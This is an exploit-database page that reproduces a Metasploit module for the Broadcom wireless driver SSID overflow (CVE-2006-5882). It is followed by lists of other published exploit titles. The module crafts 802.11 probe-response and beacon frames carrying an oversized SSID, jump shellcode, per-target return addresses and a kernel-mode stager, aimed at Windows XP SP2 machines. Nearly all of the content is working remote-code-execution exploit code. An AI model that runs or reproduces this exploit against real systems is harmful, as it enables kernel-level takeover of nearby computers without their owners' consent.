Menu

Search for hundreds of thousands of exploits

"Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit)"

Author

Exploit author

"H D Moore"

Platform

Exploit platform

windows

Release date

Exploit published date

2006-11-13

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
##
# $Id: broadcom_wifi_ssid.rb 9669 2010-07-03 03:13:45Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = LowRanking

	include Msf::Exploit::Lorcon2
	include Msf::Exploit::KernelMode

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Broadcom Wireless Driver Probe Response SSID Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in the Broadcom Wireless driver
				that allows remote code execution in kernel mode by sending a 802.11 probe
				response that contains a long SSID. The target MAC address must
				be provided to use this exploit. The two cards tested fell into the
				00:14:a5:06:XX:XX and 00:14:a4:2a:XX:XX ranges.

				This module depends on the Lorcon2 library and only works on the Linux platform
				with a supported wireless card. Please see the Ruby Lorcon2 documentation
				(external/ruby-lorcon/README) for more information.
			},
			'Author'         =>
				[
					'Chris Eagle',	# initial discovery
					'Johnny Cache <johnnycsh [at] 802.11mercenary.net>', # the man with the plan
					'skape', # windows kernel ninjitsu and debugging
					'hdm' # porting the C version to ruby
				],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9669 $',
			'References'     =>
				[
					['CVE', '2006-5882'],
					['OSVDB', '30294'],
					['URL', 'http://projects.info-pull.com/mokb/MOKB-11-11-2006.html'],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 500
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					# 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)
					[ 'Windows XP SP2 (5.1.2600.2122), bcmwl5.sys 3.50.21.10',
						{
							'Ret'      => 0x8066662c, # jmp edi
							'Platform' => 'win',
							'Payload'  =>
							{
								'ExtendedOptions' =>
								{
									'Stager'       => 'sud_syscall_hook',
									'PrependUser'  => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
									'Recovery'     => 'idlethread_restart',
									'KiIdleLoopAddress' => 0x804dbb27,

								}
							}
						}
					],

					# 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158)
					[ 'Windows XP SP2 (5.1.2600.2180), bcmwl5.sys 3.50.21.10',
						{
							'Ret'      => 0x804f16eb, # jmp edi
							'Platform' => 'win',
							'Payload'  =>
							{
								'ExtendedOptions' =>
								{
									'Stager'       => 'sud_syscall_hook',
									'PrependUser'  => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
									'Recovery'     => 'idlethread_restart',
									'KiIdleLoopAddress' => 0x804dc0c7,
								}
							}
						}
					]
				],
			'DefaultTarget' => 0,
			'DisclosureDate'  => 'Nov 11 2006'
			))

		register_options(
			[
				OptString.new('ADDR_DST', [ true,  "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']),
				OptInt.new('RUNTIME', [ true,  "The number of seconds to run the attack", 60])
			], self.class)
	end

	def exploit
		open_wifi

		stime = Time.now.to_i

		print_status("Sending beacons and responses for #{datastore['RUNTIME']} seconds...")

		while (stime + datastore['RUNTIME'].to_i > Time.now.to_i)

			select(nil, nil, nil, 0.02)
			wifi.write(create_response)

			select(nil, nil, nil, 0.01)
			wifi.write(create_beacon)

			break if session_created?

		end

		print_status("Finished sending frames...")
	end

	def create_beacon
		src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93
		dst = eton('FF:FF:FF:FF:FF:FF')
		seq = [Time.now.to_i % 4096].pack('n')

		blob = create_frame
		blob[0,1] = 0x80.chr
		blob[4,6] = dst
		blob[10,6] = src
		blob[16,6] = src
		blob[22,2] = seq

		blob
	end

	def create_response
		src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93
		dst = eton(datastore['ADDR_DST'])
		seq = [Time.now.to_i % 256].pack('n')

		blob = create_frame
		blob[0,1] = 0x50.chr
		blob[4,6] = dst
		blob[10,6] = src
		blob[16,6] = src # bssid field, good idea to set to src.
		blob[22,2] = seq

		blob
	end

	def create_frame
		"\x80" +                      # type/subtype
		"\x00" +                      # flags
		"\x00\x00" +                  # duration
		eton(datastore['ADDR_DST']) + # dst
		"\x58\x58\x58\x58\x58\x58" +  # src
		"\x58\x58\x58\x58\x58\x58" +  # bssid
		"\x70\xed" +                  # sequence number

		#
		# fixed parameters
		#

		# timestamp value
		rand_text_alphanumeric(8) +
		"\x64\x00" +                  # beacon interval
		"\x11\x04" +                  # capability flags

		#
		# tagged parameters
		#

		# ssid tag
		"\x00" + # tag: SSID parameter set
		"\x5d" + # len: length is 93 bytes

		# jump into the payload
		"\x89\xf9" +                 # mov edi, ecx
		"\x81\xc1\x7b\x00\x00\x00" + # add ecx, 0x7b
		"\xff\xe1" +                 # jmp ecx

		# padding
		rand_text_alphanumeric(79) +

		# return address
		[target.ret].pack('V') +

		# vendor specific tag
		"\xdd" + # wpa
		"\xff" + # big as we can make it

		# the kernel-mode stager
		payload.encoded
	end

end
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2009-11-12 "Microsoft Windows Server 2000 < 2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit)" dos windows "H D Moore"
2009-10-30 "Nagios3 - 'statuswml.cgi' Command Injection (Metasploit)" webapps unix "H D Moore"
2009-07-20 "DD-WRT HTTP v24-SP1 - Command Injection" remote linux "H D Moore"
2007-04-23 "Apple QuickTime for Java 7 - Memory Access (Metasploit)" remote multiple "H D Moore"
2006-11-13 "D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit)" remote windows "H D Moore"
2006-11-13 "Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit)" remote windows "H D Moore"
2006-11-01 "Apple Airport - 802.11 Probe Response Kernel Memory Corruption (PoC) (Metasploit)" dos hardware "H D Moore"
2006-09-27 "Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) (1)" remote windows "H D Moore"
2006-08-10 "Microsoft Internet Explorer - 'MDAC' Remote Code Execution (MS06-014) (Metasploit) (2)" remote windows "H D Moore"
2006-08-10 "Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)" remote windows "H D Moore"
2006-07-28 "Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution" remote multiple "H D Moore"
2006-07-25 "Mozilla Suite/Firefox < 1.5.0.5 - Navigator Object Code Execution (Metasploit)" remote multiple "H D Moore"
2006-07-14 "Mozilla Firefox 3.5 - escape Memory Corruption (Metasploit)" remote multiple "H D Moore"
2006-07-07 "Microsoft Internet Explorer 6 - 'Internet.HHCtrl' Heap Overflow" dos windows "H D Moore"
2006-06-22 "Microsoft Windows RRAS - Remote Stack Overflow (MS06-025) (Metasploit)" remote windows "H D Moore"
2006-05-15 "RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Metasploit)" remote multiple "H D Moore"
2006-04-15 "Novell Messenger Server 2.0 - 'Accept-Language' Remote Overflow (Metasploit)" remote novell "H D Moore"
2006-03-30 "PeerCast 0.1216 - Remote Buffer Overflow (Metasploit)" remote windows "H D Moore"
2006-03-20 "X.Org X11 (X11R6.9.0/X11R7.0) - Local Privilege Escalation" local linux "H D Moore"
2006-03-01 "Apple Mail.App 10.5.0 (OSX) - Image Attachment Command Execution (Metasploit)" remote osx "H D Moore"
2006-02-28 "Microsoft Internet Explorer 6.0 SP0 - IsComponentInstalled() Remote (Metasploit)" remote windows "H D Moore"
2006-02-22 "Apple Mac OSX Safari Browser - 'Safe File' Remote Code Execution (Metasploit)" remote osx "H D Moore"
2006-02-17 "Microsoft Windows Media Player 9 - Plugin Overflow (MS06-006) (Metasploit)" remote windows "H D Moore"
2006-02-08 "Mozilla Firefox 1.5 (OSX) - 'location.QueryInterface()' Code Execution (Metasploit)" remote osx "H D Moore"
2006-02-07 "Mozilla Firefox 1.5 (Linux) - 'location.QueryInterface()' Code Execution (Metasploit)" remote linux "H D Moore"
2006-01-31 "Winamp 5.12 - '.pls' Remote Buffer Overflow (Metasploit)" remote windows "H D Moore"
2005-12-27 "Microsoft Windows XP/2003 - Metafile Escape() Code Execution (Metasploit)" remote windows "H D Moore"
2005-12-09 "Lyris ListManager - Read Message Attachment SQL Injection (Metasploit)" remote windows "H D Moore"
2005-11-20 "Google Search Appliance - proxystylesheet XSLT Java Code Execution (Metasploit)" remote hardware "H D Moore"
2005-10-19 "HP-UX 11.11 - lpd Remote Command Execution (Metasploit)" remote hp-ux "H D Moore" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected